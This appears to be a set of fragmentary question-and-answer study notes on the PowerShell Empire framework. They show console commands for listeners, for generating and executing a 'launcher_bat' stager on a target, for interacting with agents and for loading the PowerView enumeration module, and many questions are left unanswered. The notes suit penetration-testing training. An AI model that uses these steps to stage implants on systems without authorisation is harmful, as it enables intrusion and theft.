What is the name of the Github repository of Empire?
PowerShellEmpire
How do you install Empire?
How do you see a list of Empire listeners?
- - (Empire: listeners) > uselistener
What are the available listeners in Empire?
How do you select the http listener and select a Host listener IP of 10.11.0.4?
If you are in a selected listener, how to you return to the main Listener Menu?
(Empire: listeners/http) > back
How can you list the available Stagers?
- - (Empire: listeners) > usestager
What are some support examples that Empire Stagers provide?
How do you select the ‘windows/launcher_bat’ Stager for the HTTP Listener?
– (Empire: listeners) > usestager windows/launcher_bat
– Empire: stager/windows/launcher_bat) > set Listener http
– (Empire: stager/windows/launcher_bat) > execute
** Here is the output **
[] Stager output written out to: /tmp/launcher.bat
————————————–
** The Stager must then be copied to the target and executed
How can we examine what the ‘windows/launcher_bat’ Stager does?
– kali@kali:/opt/Empire$ cat /tmp/launcher.bat
What is an Empire ‘Agent’?
What happens once the ‘Agent’ is operational on the target?
How do we get the ‘Agent’ operational on the target?
Once the ‘Agent’ is operational, how do we view it in Empire?
(Empire: stager/windows/launcher_bat) > agents
Once the ‘Agent’ is operational, how do we interact with it in Empire?
(Empire: agents) > interact S2Y5XW1L
How do we migrate our payload into a process on the target from the ‘Agent’ interaction in Empire?
How do you list the available Empire modules?
– (Empire: S2Y5XW1L) > usemodule
Which Empire module focuses on local client and AD enumeration?
situational_awareness
What is the module path for Powerview?
situational_awareness/network/powerview
How do you display the options of the module?
info
What does it mean if the ‘NeedsAdmin’ field is set to ‘True’?
What does it mean if the ‘OpsecSafe’ field is set to ‘True’?
What does it mean if the ‘MinLanguageVersion’ field is set to ‘True’?
What does it mean if the ‘Background’ field is set to ‘True’?